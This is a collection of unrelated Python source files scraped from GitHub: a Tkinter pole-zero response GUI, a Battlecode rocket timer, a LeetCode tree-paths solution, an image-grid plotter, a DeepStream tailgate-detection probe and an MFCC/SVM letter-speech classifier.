while(rem>=10) :\r\n rem= rem/ 10\r\n f=f+1;\r\n div=int(rem+1)*pow(10,f)\r\n if(magmax <1):\r\n rem1 = magmax\r\n f=0\r\n while(rem1<=1):\r\n rem1=rem1*10;\r\n f=f-1;\r\n div=int(rem1+1)*pow(10,f-1)\r\n t=t+scale\r\n \r\n mag1=0\r\n t=0\r\n n=0\r\n while(t=1) :\r\n remul= remul/ 10\r\n ful=ful+1;\r\n if(UL <1):\r\n rem1ul = UL\r\n ful=0\r\n while(rem1ul<=1):\r\n rem1ul=rem1ul*10;\r\n ful=ful-1;\r\n UL= pow(10,(ful+1))\r\n\r\n while(nvmagmax) :\r\n magmax=abs(mag1)\r\n rem=magmax\r\n f=-1\r\n while(rem>=10) :\r\n rem= rem/ 10\r\n 
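            # decade finder: rem is divided by 10 until it lands in [1, 10); for
            # magmax >= 1 this leaves f == floor(log10(magmax)) - 1, and the
            # div = int(rem+1)*pow(10,f) computed after the loop becomes the
            # step size used to scale the magnitude axis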
f=f+1;\r\n div=int(rem+1)*pow(10,f)\r\n if(magmax <1):\r\n rem1 = magmax\r\n f=0\r\n while(rem1<=1):\r\n rem1=rem1*10;\r\n f=f-1;\r\n div=int(rem1+1)*pow(10,f-1)\r\n t=t+scale\r\n \r\n mag1=0\r\n t=0\r\n n=0\r\n while(t10) :\r\n p=10\r\n canvas.itemconfigure(tag,text=\"(-,-)\")\r\n canvas.coords(oval,(250-20*10,250-20*10,250+20*10,250+20*10))\r\n canvas.coords(lin,(250,250,250,250))\r\n else :\r\n canvas.coords(oval,(250-20*p,250-20*p,250+20*p,250+20*p))\r\n canvas.coords(lin,(250,250,event.x,event.y))\r\n canvas.itemconfigure(tag,text=\"%.2f\"%p + \" < \" + \"%.2f\"%q )\r\ndef zeroes(event) :\r\n global but\r\n but.config(state='active')\r\n global k\r\n global h\r\n global t\r\n global p\r\n global zcount\r\n if(h in rnum and t in inum) :\r\n messagebox.showerror(\"ERROR\", \"MULTIPLE ORDERS ARE NOT PERMITTED\" )\r\n else :\r\n if(p<10) :\r\n if(t==0) :\r\n zcount=zcount+1;\r\n rnum.append(h)\r\n inum.append(t)\r\n if(pow(t,2) > 2*pow(h,2)) :\r\n Wr= math.sqrt(pow(t,2) - pow(h,2))\r\n wr.append(Wr)\r\n gat2= canvas.create_text(478,70+25*(zcount),text=\"\",anchor=\"nw\")\r\n canvas.itemconfigure(gat2,text=\"%.2f\"%h + \" + \" + \"%.2f\"%t + \" i\")\r\n gat3= canvas.create_text(((10+h)*20+50),(450-(10+t)*20),text=\"\")\r\n canvas.itemconfigure(gat3,text=\"o\")\r\n k=k+1\r\n else :\r\n zcount=zcount+1;\r\n rnum.append(h)\r\n inum.append(t)\r\n rnum.append(h)\r\n inum.append(-1*t)\r\n if(pow(t,2) > 2*pow(h,2)) :\r\n Wr= math.sqrt(pow(t,2) - pow(h,2))\r\n wr.append(Wr)\r\n Wn=math.sqrt(pow(h,2) + pow(t,2))\r\n delta = h/ Wn\r\n sc.append(Wn*(1 - 2*pow(delta,2)+ math.sqrt( 2- 4*pow(delta,2) + 4*pow(delta,4))))\r\n gat= canvas.create_text(478,70+25*zcount,text=\"\",anchor=\"nw\")\r\n gat1= canvas.create_text(578,70+25*zcount,text=\"\",anchor=\"nw\")\r\n gat5= canvas.create_text(((10+h)*20+50),(450-(10+t)*20),text=\"\")\r\n canvas.itemconfigure(gat5,text=\"o\")\r\n gat4= canvas.create_text(((10+h)*20+50),(450-(10-t)*20),text=\"\")\r\n canvas.itemconfigure(gat4,text=\"o\")\r\n canvas.itemconfigure(gat,text=\"%.2f\"%h + \" + \" + \"%.2f\"%t + \" i\")\r\n canvas.itemconfigure(gat1,text=\"%.2f\"%h + \" + \" + \"%.2f\"%(-1*t) + \" i\")\r\n k=k+2\r\n \r\n\r\ndef poles(event) :\r\n global but\r\n but.config(state='active')\r\n global l\r\n global h\r\n global t\r\n global p\r\n global q\r\n global pcount\r\n if(h in rden and t in iden) :\r\n messagebox.showerror(\"ERROR\", \"REPEATED POLES AND ZEROES ARE NOT PERMITTED\" )\r\n else:\r\n if(p<10) :\r\n if(t==0) :\r\n pcount=pcount+1;\r\n rden.append(h)\r\n iden.append(t)\r\n if(pow(t,2) > 2*pow(h,2)) :\r\n Wr= math.sqrt(pow(t,2) - pow(h,2))\r\n wr.append(Wr)\r\n cat2= canvas.create_text(700,70+25*pcount,text=\"\",anchor=\"nw\")\r\n canvas.itemconfigure(cat2,text=\"%.2f\"%h + \" + \" + \"%.2f\"%t + \" i\")\r\n cat3= canvas.create_text(((10+h)*20+50),(450-(10+t)*20),text=\"\")\r\n canvas.itemconfigure(cat3,text=\"x\")\r\n l=l+1\r\n else :\r\n pcount=pcount+1;\r\n rden.append(h)\r\n iden.append(t)\r\n rden.append(h)\r\n iden.append(-1*t)\r\n if(pow(t,2) > 2*pow(h,2)) :\r\n Wr= math.sqrt(pow(t,2) - pow(h,2))\r\n wr.append(Wr)\r\n Wn=math.sqrt(pow(h,2) + pow(t,2))\r\n delta = h/ Wn\r\n sc.append(Wn*(1 - 2*pow(delta,2)+ math.sqrt( 2- 4*pow(delta,2) + 4*pow(delta,4))))\r\n cat= canvas.create_text(700,70+25*pcount,text=\"\",anchor=\"nw\")\r\n cat1= canvas.create_text(800,70+25*pcount,text=\"\",anchor=\"nw\")\r\n cat5= canvas.create_text(((10+h)*20+50),(450-(10+t)*20),text=\"\")\r\n canvas.itemconfigure(cat5,text=\"x\")\r\n cat4= 
canvas.create_text(((10+h)*20+50),(450-(10-t)*20),text=\"\")\r\n canvas.itemconfigure(cat4,text=\"x\")\r\n canvas.itemconfigure(cat,text=\"%.2f\"%h + \" + \" + \"%.2f\"%t + \" i\")\r\n canvas.itemconfigure(cat1,text=\"%.2f\"%h + \" + \" + \"%.2f\"%(-1*t) + \" i\")\r\n l= l+2\r\n\r\ndef up(event) :\r\n global h\r\n global t\r\n global p\r\n global q\r\n p= p+0.1\r\n h= p*math.cos(math.radians(q))\r\n t = p*math.sin(math.radians(q))\r\n if(q==180) :\r\n t=0\r\n \r\n if(p>10) :\r\n p=10\r\n canvas.itemconfigure(tag,text=\"(-,-)\")\r\n canvas.coords(oval,(250-20*10,250-20*10,250+20*10,250+20*10))\r\n canvas.coords(lin,(250,250,250,250))\r\n else :\r\n canvas.coords(oval,(250-20*p,250-20*p,250+20*p,250+20*p))\r\n canvas.coords(lin,(250,250,50+20*(10+h),450-20*(10+t)))\r\n canvas.itemconfigure(tag,text=\"%.2f\"%p + \" < \" + \"%.2f\"%q )\r\ndef down(event) :\r\n global h\r\n global t\r\n global p\r\n global q\r\n p= p-0.1\r\n if(p<0) :\r\n p=0\r\n h= p*math.cos(math.radians(q))\r\n t = p*math.sin(math.radians(q))\r\n if(q==180) :\r\n t=0\r\n canvas.coords(oval,(250-20*p,250-20*p,250+20*p,250+20*p))\r\n canvas.coords(lin,(250,250,50+20*(10+h),450-20*(10+t)))\r\n canvas.itemconfigure(tag,text=\"%.2f\"%p + \" < \" + \"%.2f\"%q )\r\ndef left(event) :\r\n global h\r\n global t\r\n global p\r\n global q\r\n q= q + 1 \r\n h= p*math.cos(math.radians(q))\r\n t = p*math.sin(math.radians(q))\r\n if(q==180) :\r\n t=0\r\n if(p>10) :\r\n p=10\r\n canvas.itemconfigure(tag,text=\"(-,-)\")\r\n canvas.coords(oval,(250-20*10,250-20*10,250+20*10,250+20*10))\r\n canvas.coords(lin,(250,250,250,250))\r\n else :\r\n canvas.coords(oval,(250-20*p,250-20*p,250+20*p,250+20*p))\r\n canvas.coords(lin,(250,250,50+20*(10+h),450-20*(10+t)))\r\n canvas.itemconfigure(tag,text=\"%.2f\"%p + \" < \" + \"%.2f\"%q )\r\ndef right(event) :\r\n global h\r\n global t\r\n global p\r\n global q\r\n q= q - 1 \r\n h= p*math.cos(math.radians(q))\r\n t = p*math.sin(math.radians(q))\r\n if(q==180) :\r\n t=0\r\n if(p>10) :\r\n p=10\r\n canvas.itemconfigure(tag,text=\"(-,-)\")\r\n canvas.coords(oval,(250-20*10,250-20*10,250+20*10,250+20*10))\r\n canvas.coords(lin,(250,250,250,250))\r\n else :\r\n canvas.coords(oval,(250-20*p,250-20*p,250+20*p,250+20*p))\r\n canvas.coords(lin,(250,250,50+20*(10+h),450-20*(10+t)))\r\n canvas.itemconfigure(tag,text=\"%.2f\"%p + \" < \" + \"%.2f\"%q )\r\n\r\ndef done() :\r\n\r\n canvas.unbind('')\r\n canvas.unbind('')\r\n canvas.unbind('')\r\n root.unbind('')\r\n root.unbind('')\r\n root.unbind('')\r\n root.unbind('')\r\n root.unbind('')\r\n root.unbind('') \r\n canvas.itemconfigure(tag,text=\"(-,-)\")\r\n canvas.coords(oval,(250,250,250,250))\r\n canvas.coords(lin,(250,250,250,250))\r\n menubar.entryconfig(\"Frequency Response\",state='normal')\r\n menubar.entryconfig(\"Time Response\",state='normal')\r\n but1.config(state='normal')\r\n but.config(state='disabled')\r\n if(k>=l):\r\n messagebox.showerror(\"ERROR\", \"THE NUMBER OF POLES MUST BE MORE THAN THE NUMBER OF ZEROES. 
PLEASE EDIT THE ENTRY\" )\r\n addpz()\r\n \r\n\r\ndef addpz():\r\n canvas.bind('',motion)\r\n canvas.bind('',poles)\r\n canvas.bind('',zeroes)\r\n root.bind('',poles)\r\n root.bind('',zeroes)\r\n root.bind('',up)\r\n root.bind('',down)\r\n root.bind('',right)\r\n root.bind('',left) \r\n menubar.entryconfig(\"Frequency Response\",state='disabled')\r\n menubar.entryconfig(\"Time Response\",state='disabled')\r\n but1.config(state='disabled')\r\n but.config(state='normal')\r\nroot.title('GUI SYSTEM RESPONSE PACKAGE ')\r\ncanvas = Canvas(root,width=900,height=500,bg='#eee8aa')\r\n\r\ntag= canvas.create_text(10,10,text=\"\",anchor=\"nw\")\r\ncanvas.pack()\r\n\r\ncanvas.create_line(470,0,470,500,width=2,fill='white')\r\ncanvas.create_line(50,250,450,250,width=2)\r\ncanvas.create_line(250,450,250,50,width=2)\r\ncanvas.create_text(550,60,text=\"ZEROES\")\r\ncanvas.create_text(780,60,text=\"POLES\")\r\ncanvas.create_text(680,20,text=\"Use SHIFT/RIGHT CLICK for entry of zeroes \\n and ENTER/LEFT CLICK for entry of poles\")\r\ncanvas.create_text(250,480,text=\"Use UP and DOWN arrow keys for magnitude adjustments \\n and LEFT and RIGHT arrow keys for angle adjustments\")\r\noval=canvas.create_oval(250,250,250,250,width=1)\r\nlin=canvas.create_line(250,250,250,250)\r\n\r\n\r\ncanvas.bind('',motion)\r\ncanvas.bind('',poles)\r\ncanvas.bind('',zeroes)\r\nroot.bind('',poles)\r\nroot.bind('',zeroes)\r\nroot.bind('',up)\r\nroot.bind('',down)\r\nroot.bind('',right)\r\nroot.bind('',left)\r\n \r\n\r\n\r\n\r\nfor i in range(21):\r\n x= 50 + (i*20)\r\n canvas.create_line(x,250,x,245,width=2)\r\n canvas.create_text(x,254,text='%d'%(i-10),anchor=N)\r\nfor j in range(21):\r\n y= 450 - (j*20)\r\n canvas.create_line(250,y,255,y,width=2)\r\n canvas.create_text(245,y,text='%d'%(j-10),anchor=E)\r\nx=0;\r\ny=0;\r\n\r\nl1= Label(root,text='GAIN')\r\nl1.pack(side='left')\r\nz1=Entry(root)\r\nz1.pack(side='left')\r\nz1.insert(3,'1')\r\n\r\ngain=float(z1.get())\r\nbut=Button(root,text='DONE',command=done,state='disabled')\r\nbut.pack(side=RIGHT)\r\nbut1=Button(root,text='ADD POLES AND ZEROES ',state='disabled',command=addpz)\r\nbut1.pack(side=BOTTOM)\r\n\r\n\r\nroot.mainloop()\r\n","repo_name":"NiveditaSuresh/GUI-based-TFAP","sub_path":"TFAP.py","file_name":"TFAP.py","file_ext":"py","file_size_in_byte":33172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42121476533","text":"import battlecode as bc\nimport random\nimport sys\nimport traceback\nimport time\n\nimport os\nprint(os.getcwd())\n\n# A GameController is the main type that you talk to the game with.\n# Its constructor will connect to a running game.\nop = bc.OrbitPattern()\ndirections = list(bc.Direction)\n\nprint(\"pystarted\")\n\n# It's a good idea to try to keep your bots deterministic, to make debugging easier.\n# determinism isn't required, but it means that the same things will happen in every thing you run,\n# aside from turns taking slightly different amounts of time due to noise.\nrandom.seed(6137)\n\n# let's start off with some research!\n# we can queue as much as we want.\n\nmy_team = gc.team()\nearth_flood_round = 750\n\nclass RocketLaunch(object):\n\t\n\tdef __init__(self):\n\t\tarrival_time = [i for i in range(earth_flood_round)]\n\t\tfor current_round in range(1, earth_flood_round):\n\t\t\tarrival_time[i] += op.duration(i)\n\t\t\n\t\tbest_launch_time = [i for i in range(earth_flood_round)]\n\t\tfor current_round in range(earth_flood_round-2, 0, -1):\n\t\t\tif 
arrival_time[best_launch_time[current_round+1]] < arrival_time[current_round]:\n\t\t\t\tbest_launch_time[current_round] = best_launch_time[current_round+1]\n\t\t\telse:\n\t\t\t\tbest_launch_time[current_round] = current_round\n\t\t# keep the table on the instance so get_launch_time can index into it\n\t\tself.best_launch_time = best_launch_time\n\n\tdef get_launch_time(self, round):\n\t\treturn self.best_launch_time[round]\n","repo_name":"AnPelec/Battlecode-2018","sub_path":"Miscellaneous/rocket_launch_time.py","file_name":"rocket_launch_time.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"18494905109","text":"# -*- coding:utf-8 -*-\nfrom collections import deque\nclass Solution:\n    def binaryTreePaths(self, root):\n        if root is None: return []\n        # BFS over (node, path-so-far) pairs\n        queue = deque([(root, str(root.val))])\n        ans = []\n        while queue:\n            top, path = queue.popleft()\n            if top.left is None and top.right is None:\n                ans.append(path)\n                continue\n            if top.left:\n                queue.append((top.left, path + \"->\" + str(top.left.val)))\n            if top.right:\n                queue.append((top.right, path + \"->\" + str(top.right.val)))\n        return ans\n\n# class Solution:\n#     # @param {TreeNode} root the root of the binary tree\n#     # @return {List[str]} all root-to-leaf paths\n#     def dfs(self, node, result, tmp):\n#         tmp.append(str(node.val))\n#         if node.left is None and node.right is None:\n#             result.append('->'.join(tmp))\n#             tmp.pop()\n#             return\n#         if node.left:\n#             self.dfs(node.left, result, tmp)\n#         if node.right:\n#             self.dfs(node.right, result, tmp)\n#         tmp.pop()\n#\n#     def binaryTreePaths(self, root):\n#         result = []\n#         if root is None: return result\n#         self.dfs(root, result, [])\n#         return result","repo_name":"sunxianfeng/LeetCode-and-python","sub_path":"leetcode with python/binaryTreePaths.py","file_name":"binaryTreePaths.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"5105196139","text":"\nimport numpy as np\nimport gv\n#from scipy.ndimage.interpolation import zoom\n\nclass ImageGrid(object):\n    def __init__(self, rows, cols, size, border_color=np.array([0.5, 0.5, 0.5]), nan_color=np.array([1.0, 1.0, 1.0])):\n        self._rows = rows\n        self._cols = cols\n        self._size = size\n        self._border = 1\n        self._border_color = np.array(border_color)\n        self._nan_color = np.array(nan_color)\n\n        self._fullsize = (self._border + (size[0] + self._border) * self._rows,\n                          self._border + (size[1] + self._border) * self._cols)\n\n        self._data = np.ones(self._fullsize + (3,), dtype=np.float64)\n\n    @property\n    def image(self):\n        return self._data\n\n    def set_image(self, image, row, col, vmin=None, vmax=None, cmap=None):\n        import matplotlib as mpl\n        import matplotlib.pylab as plt\n\n        if cmap is None:\n            cmap = plt.cm.gray\n        if vmin is None:\n            vmin = image.min()\n        if vmax is None:\n            vmax = image.max()\n\n        from gv.fast import resample_and_arrange_image\n\n        if vmin == vmax:\n            diff = 1\n        else:\n            diff = vmax - vmin\n\n        image_indices = (np.clip((image - vmin) / diff, 0, 1) * 255).astype(np.uint8)\n\n        rgb = resample_and_arrange_image(image_indices, self._size, mpl.colors.makeMappingArray(256, cmap))\n\n        self._data[row * (self._size[0] + self._border) : (row + 1) * (self._size[0] + self._border) + self._border,\n                   col * (self._size[1] + self._border) : (col + 1) * (self._size[1] + self._border) + self._border] = self._border_color \n\n        anchor = (self._border + row * (self._size[0] + self._border),\n                  self._border + col * (self._size[1] + self._border))\n\n        not_valid = np.isnan(image)[...,np.newaxis]\n\n        self._data[anchor[0] : 
anchor[0] + rgb.shape[0],\n anchor[1] : anchor[1] + rgb.shape[1]] = rgb * (1 - not_valid) + self._nan_color * not_valid\n\n def save(self, path, scale=1):\n data = self._data\n if scale != 1:\n from skimage.transform import resize\n data = resize(self._data, tuple([self._data.shape[i] * scale for i in range(2)]), order=0)\n gv.img.save_image(path, data)\n","repo_name":"gustavla/vision-research","sub_path":"gv/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43960336247","text":"# 4.3\n# Define the Probe Function\ndef osd_sink_pad_buffer_probe(pad, info, u_data):\n gst_buffer=info.get_buffer()\n\n # Retrieve batch metadata from the gst_buffer\n batch_meta=pyds.gst_buffer_get_nvds_batch_meta(hash(gst_buffer))\n l_frame=batch_meta.frame_meta_list\n while l_frame is not None:\n \n # Initially set the tailgate indicator to False for each frame\n tailgate=False\n try:\n frame_meta=pyds.NvDsFrameMeta.cast(l_frame.data)\n except StopIteration:\n break\n frame_number=frame_meta.frame_num\n l_obj=frame_meta.obj_meta_list\n \n # Iterate through each object to check its dimension\n while l_obj is not None:\n try:\n obj_meta=pyds.NvDsObjectMeta.cast(l_obj.data)\n \n # If the object meet the criteria then set tailgate indicator to True\n obj_bottom=obj_meta.rect_params.top+obj_meta.rect_params.height\n if (obj_meta.rect_params.width > FRAME_WIDTH*.3) & (obj_bottom > FRAME_HEIGHT*.9): \n tailgate=True\n \n except StopIteration:\n break\n try: \n l_obj=l_obj.next\n except StopIteration:\n break\n \n display_meta=pyds.nvds_acquire_display_meta_from_pool(batch_meta)\n display_meta.num_labels = 1\n py_nvosd_text_params = display_meta.text_params[0]\n # Setting display text to be shown on screen\n # Note that the pyds module allocates a buffer for the string, and the\n # memory will not be claimed by the garbage collector.\n # Reading the display_text field here will return the C address of the\n # allocated string. 
Use pyds.get_string() to get the string content.\n py_nvosd_text_params.display_text = \"Frame Number={} Tailgate={}\".format(frame_number, tailgate)\n\n # Now set the offsets where the string should appear\n py_nvosd_text_params.x_offset = 10\n py_nvosd_text_params.y_offset = 12\n\n # Font , font-color and font-size\n py_nvosd_text_params.font_params.font_name = \"Serif\"\n py_nvosd_text_params.font_params.font_size = 36\n # set(red, green, blue, alpha); set to White\n py_nvosd_text_params.font_params.font_color.set(1.0, 1.0, 1.0, 1.0)\n\n # Text background color\n py_nvosd_text_params.set_bg_clr = 1\n # set(red, green, blue, alpha); set to Black\n py_nvosd_text_params.text_bg_clr.set(0.0, 0.0, 0.0, 1.0)\n # Using pyds.get_string() to get display_text as string\n print(pyds.get_string(py_nvosd_text_params.display_text))\n pyds.nvds_add_display_meta_to_frame(frame_meta, display_meta)\n print(f'Analyzing frame {frame_number}', end='\\r')\n inference_output.append(str(int(tailgate)))\n try:\n l_frame=l_frame.next\n except StopIteration:\n break\n return Gst.PadProbeReturn.OK","repo_name":"rajeshroy402/tailgate-code","sub_path":"nvosd_probe.py","file_name":"nvosd_probe.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25111137711","text":"import sys\nimport warnings\nimport random\n\nif not sys.warnoptions:\n warnings.simplefilter(\"ignore\")\nimport os\nfrom string import ascii_uppercase\nfrom python_speech_features import mfcc\nfrom python_speech_features import delta\nfrom python_speech_features import logfbank\nimport scipy.io.wavfile as wav\nimport scipy.interpolate as interpol\nimport glob\nimport wave\nimport pickle\nimport sklearn\nimport scipy.io.wavfile as wav\n\nimport numpy as np\nfrom time import time\nfrom sklearn.metrics import classification_report\n\nimport joblib\nfrom sklearn import svm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import LinearSVC\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport subprocess\n\n\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics import accuracy_score\nfrom matplotlib import pyplot as plt\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import average_precision_score\nfrom scipy import signal\nimport itertools\nfrom subprocess import Popen\n\ngnuplot_exe = r\"C:\\Program Files (x86)\\gnuplot\\bin\\gnuplot.exe\"\ngrid_py = r\"C:\\Users\\bruce\\Documents\\Personal-projects\\backup\\gpu\\tools\\grid.py\"\nsvmtrain_exe = (\n r\"C:\\Users\\bruce\\Documents\\Personal-projects\\backup\\gpu\\windows\\svm-train-gpu.exe\"\n)\nsvmpredict_exe = (\n r\"C:\\Users\\bruce\\Documents\\Personal-projects\\backup\\gpu\\windows\\svm-predict.exe\"\n)\ncrange = \"-5,13,2\" # \"1,5,2\"\ngrange = \"-15,-8,2\" # \"-3,2,2\"\n\n\ndef paramsfromexternalgridsearch(filename, crange, grange, printlines=False):\n # printlines specifies whether or not the function should print every line of the grid search verbosely\n cmd = 'python \"{0}\" -log2c {1} -log2g {2} -svmtrain \"{3}\" -gnuplot \"{4}\" -png grid.png \"{5}\"'.format(\n grid_py, crange, grange, svmtrain_exe, gnuplot_exe, 
filename\n )\n f = Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout\n\n line = \"\"\n while True:\n last_line = line\n line = f.readline()\n if not line:\n break\n if printlines:\n print(line)\n c, g, rate = map(float, last_line.split())\n return c, g, rate\n\n\ndef accuracyfromexternalpredict(\n scaled_test_file, model_file, predict_test_file, predict_output_file\n):\n cmd = '\"{0}\" \"{1}\" \"{2}\" \"{3}\"'.format(\n svmpredict_exe, scaled_test_file, model_file, predict_test_file\n )\n f = Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout\n # f = subprocess.Popen(cmd, shell = True, stderr=subprocess.STDOUT, stdout=subprocess.PIPE)\n\n line = \"\"\n while True:\n last_line = line\n line = f.readline()\n if not line:\n break\n\n return (\n last_line.split(\" \")[3][1:-1].split(\"/\")[0],\n last_line.split(\" \")[3][1:-1].split(\"/\")[1],\n )\n\n\ndef normalize(inSig, outLen):\n # This function normalizes the audio signal.\n # It first produces an interp1d structure that readily interpolates between points\n # Then it sets the size of the space to outLen=200000 points, and interp1d interpolates to fill in gaps\n # In essence, it takes every audio signal and produces a signal with outLen=200000 data points in it = normalization\n # inSig = np.array(inSig)\n arrInterpol = interpol.interp1d(np.arange(inSig.size), inSig)\n arrOut = arrInterpol(np.linspace(0, inSig.size - 1, outLen))\n return arrOut\n\n\ndef justpadwithzeros(inSig, rate):\n # >> > a = [1, 2, 3, 4, 5]\n # >> > np.pad(a, (2, 3), 'constant', constant_values=(4, 6))\n # array([4, 4, 1, 2, 3, 4, 5, 6, 6, 6])\n # longest is 267264\n maxlength = rate * 6.1 # 6.1s long which comes to 269010 samples at this rate\n return np.pad(inSig, (0, int(maxlength - inSig.shape[0])), mode=\"constant\")\n\n\ndef writetopcklfile(outpath, data):\n with open(outpath, \"wb\") as f:\n pickle.dump(data, f)\n\n\ndef readfrompcklfile(outpath):\n with open(outpath, \"rb\") as f:\n return pickle.load(f)\n\n\ndef custom_dump_svmlight_file(X_train, Y_train, filename):\n # This function inserts the extracted features in the libsvm format\n featinds = [\" \" + str(i) + \":\" for i in range(1, len(X_train[0]) + 1)]\n with open(filename, \"w\") as f:\n for ind, row in enumerate(X_train):\n f.write(\n str(Y_train[ind])\n + \" \"\n + \"\".join(\n [\n x\n for x in itertools.chain.from_iterable(\n zip(featinds, map(str, row))\n )\n if x\n ]\n )\n + \"\\n\"\n )\n\n\ndef training(training_data, test_data, file_output_name, params):\n X_train, Y_train = training_data\n X_test, Y_test = test_data\n\n clf = svm.SVC(kernel=\"rbf\", C=params[\"C\"], gamma=params[\"gamma\"])\n clf.fit(X_train, Y_train)\n pred = clf.predict(X_test)\n print(clf.score(X_test, Y_test))\n # print(confusion_matrix(Y_test, pred))\n # print(classification_report(Y_test, pred))\n # save the classifier\n\n with open(file_output_name, \"wb\") as fid:\n pickle.dump(clf, fid)\n\n return confusion_matrix(Y_test, pred)\n\n\nmapping = {v: k for k, v in enumerate(ascii_uppercase)}\ninv_map = {v: k for k, v in mapping.items()}\n\n\ndef main():\n start = time()\n\n path = r\"data_by_subject\"\n files = os.listdir(path)\n\n features = []\n label = []\n Filenames = {}\n X = None\n Xdir = {}\n y = []\n\n y_unseen = []\n X_unseen = None\n\n from tqdm import tqdm\n\n # The upper bound for the data set samples is 2.89 seconds so later just pad every sequence with\n # zeros up to this length\n rate = 44100\n maxlength = rate * 2.82\n counter = 0\n unseen_counter = 0\n file_count = sum(len(files) for _, _, files 
in os.walk(path))\n\n choices = [\"Subject_1\", \"Subject_2\", \"Subject_3\", \"Subject_4\", \"Subject_5\"]\n print(choices)\n max_length = 0\n with tqdm(total=file_count) as pbar:\n for subdir, dirs, files in tqdm(os.walk(\"data_by_subject/\")):\n file_counter = 0\n print(subdir, len(files))\n for soundfile in files:\n if file_counter == 0 or file_counter == 9:\n file_counter += 1\n continue\n pbar.update(1)\n if soundfile.endswith(\".wav\"):\n (rate, sig) = wav.read(subdir + \"/\" + soundfile)\n if len(sig) / float(rate) > max_length:\n max_length = len(sig) / float(rate)\n newSig = np.array(sig)\n if rate != 44100:\n\n base2roreach = int(\n np.floor(np.log2(newSig.shape[0] / rate * 44100))\n )\n samplestoeliminate = int(\n np.ceil(\n newSig.shape[0] - ((2**base2roreach * rate) / 44100)\n )\n )\n newSig = newSig[samplestoeliminate:]\n newwidth = (\n 2**base2roreach\n ) # int(np.ceil(newSig.shape[0]/rate*44100))\n newSig = signal.resample(newSig, newwidth)\n rate = 44100\n # print(rate)\n\n # newSig = justpadwithzeros(newSig, rate)\n newSig = np.pad(\n newSig, (0, int(maxlength - newSig.shape[0])), mode=\"constant\"\n )\n\n mfcc_feat = mfcc(\n newSig, rate, nfft=2048, winfunc=np.hamming\n ).ravel()\n mfcc_feat = mfcc_feat.reshape(1, mfcc_feat.shape[0])\n # mfcc_feat = None\n\n Xdir[soundfile.replace(\".wav\", \"\")] = counter\n label = mapping[os.path.join(subdir, soundfile).split(\"\\\\\")[1]]\n\n if any(sub in subdir for sub in choices):\n if counter == 0:\n X = mfcc_feat\n else:\n X = np.vstack((X, mfcc_feat))\n pass\n y.append(label)\n counter += 1\n else:\n # print(os.path.join(subdir, soundfile))\n if unseen_counter == 0:\n X_unseen = mfcc_feat\n else:\n X_unseen = np.vstack((X_unseen, mfcc_feat))\n pass\n y_unseen.append(label)\n unseen_counter += 1\n file_counter += 1\n print(\"maxlength = \", max_length)\n # y.append(soundfile[:1])\n finish = time()\n print(\"Time to load data %.3f s\" % (finish - start))\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=30, stratify=y\n )\n # feature scaling in order to standardize the features\n scaler = StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n writetopcklfile(\"training_data\", [X_train, y_train])\n writetopcklfile(\"semi-seen-data\", [X_test, y_test])\n custom_dump_svmlight_file(X_train, y_train, \"new_training_data\")\n custom_dump_svmlight_file(X_test, y_test, \"semi-seen-data\")\n # custom_dump_svmlight_file(X_unseen, y_unseen, \"unseen-data\")\n \n \n scaler = StandardScaler().fit(X_unseen)\n X_unseen = scaler.transform(X_unseen)\n\n c, gamma, accuracy = paramsfromexternalgridsearch(\n \"new_training_data\",\n crange,\n grange,\n printlines=True,\n )\n print(accuracy)\n\n all_matrix = training(\n (X_train, y_train),\n (X_test, y_test),\n \"classifier_all.pkl\",\n {\"C\": c, \"gamma\": gamma},\n )\n\n df_cm = pd.DataFrame(\n all_matrix,\n index=[i for i in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"],\n columns=[i for i in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"],\n )\n plt.figure(figsize=(10, 7))\n all_map = sns.heatmap(df_cm, annot=True)\n\n fig = all_map.get_figure()\n fig.savefig(\"semi-seen.png\")\n\n model = pickle.load(open(\"classifier_all.pkl\", \"rb\"))\n y_pred = model.predict(X_unseen)\n\n print(\"Unseen accuracy score\")\n print(accuracy_score(y_unseen, y_pred))\n df_cm = pd.DataFrame(\n confusion_matrix(y_unseen, y_pred),\n index=[i for i in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"],\n columns=[i for i in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"],\n )\n 
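    # --- illustrative aside (a minimal sketch, not part of the original pipeline):
    # the heatmap drawn below can be cross-checked numerically -- accuracy is the
    # diagonal mass of the confusion matrix, and classification_report (already
    # imported at the top of this script) gives per-letter precision/recall/F1;
    # cm_unseen is a local name introduced here, not one the script defines
    cm_unseen = confusion_matrix(y_unseen, y_pred)
    print("unseen accuracy (diagonal mass):", np.trace(cm_unseen) / cm_unseen.sum())
    print(classification_report(y_unseen, y_pred))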
